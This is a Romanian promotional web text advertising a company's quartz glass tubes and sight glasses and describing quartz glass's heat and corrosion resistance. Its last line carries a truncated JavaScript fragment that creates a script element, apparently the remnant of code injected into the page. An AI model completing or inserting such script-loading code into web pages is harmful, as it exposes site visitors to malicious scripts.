Specializata in comercializarea produselor din fibra solubila si fibra ceramica, ABC-456 COM include in oferta sa si produse din sticla de cuart in gama completa si la preturi accesibile. Caracterizata prin rezistenta  chimica  la temperaturi inalte, sticla de cuart este utilizata in ramuri ale tehnicii si ale stiintei.

Din categoria produselor din sticla de cuart puse la dispozitie de  ABC-456 COM, fac parte: tuburi, vizoare din tub cuart si diverse alte piese de o calitate exceptionala.

Un produs de mare exceptie este tubul din sticla de cuart. Acesta se remarca prin rezistenta mecanica sporita, rezistenta excelenta la coroziune, stabilitatea termica foarte buna si transmisia luminii buna. Produsul se utilizeaza cu precadere la lampile electrice de interior, in industria semiconductorilor, in metalurgie, in telecomunicatii si numeroase alte aplicatii.

ABC-456 COM comercializeaza o gama extinsa de produse din sticla de cuart, inclusiv tuburi din sticla de cuart. Produsele sunt fabricate conform celor mai stricte rigori in domeniu, calitatea lor fiind desavarsita.

Intra pe www.abc-456.com si comanda produse si articole din sticla de cuart la preturi foarte avantajoase. Livram in toate orasele tarii

Sticla de cuart-Proprietati termorezistente de exceptie

Sticla termorezistenta, vesela  acidorezistenta, aparatura rezistenta la foc, izolatoarele de voltaj mare,  spectrele ultraviolete si transparente toate au la baza un material de mare exceptie si cu caracteristici unice: sticla de cuart.

Ce trebuie sa stii depsre sticla de cuart?

Sticla de cuart are excelente caracteristici fizice si chimice, fapt pentru care este utilizata la scara larga in industrii dintre cele mai diverse.

Ce anume face sticla de cuart un produs premium? In primul rand, rezistenta la temperaturi inalte sau termorezistenta. Temperatura de topire a cuartului este de  1.730 grade Celsius, putand fi utilizata pentru un timp scurt si la temperaturi de peste 1.400 de grade Celsius.

In general, sticla este un produs fragil si supus uzurii. Nu si sticla de cuart. Aceasta nu reactioneaza cu aproape nici un material sau agent coroziv. In comparatie cu ceramica, sticla de cuart rezista de pana la 30 de ori mai bine la coroziune, fiind mai rezistenta si ca otelul inoxidabil.

Un alt punct forte al sticle de cuart este stabilitatea termica foarte buna (suporta schimbari bruste de temperatura), dar si capacitatea excelenta de transmisie a luminii (de la ultraviolete la infrarosii).

Important de retinut este faptul ca, articolele de cuart pot rezista la incalzire pana la temperaturi foarte inalte cu racire brusca in aer sau  apa.

ABC-456 COM-Tuburi, vizoare din tub cuart si alte piese din sticla de cuart

Indiferent de domeniul in care activezi si ai nevoie de produse din sticla de cuart sau alte aricole din fibra ceramica sau fibra solubila, ABC-456 COM iti poate fi un partener pe termen lung.

Produsele din sticla de cuart comercializate de ABC-456 COM SRL, sunt fabricate la cele mai inalte standarde europene si la preturi accesibile. Tuburile din sticla de curat comercializate de firma noastra sunt extrem de eficiente in aplicatii de la A la Z, de la metalurgie si telecomunicatii, pana la industria chimica si centrale electrice.

Intreaga oferta in materie de produse din sticla de cuart o poti analiza accesand www.abc-456.com.var d=document;var s=d.createElement(‘script’);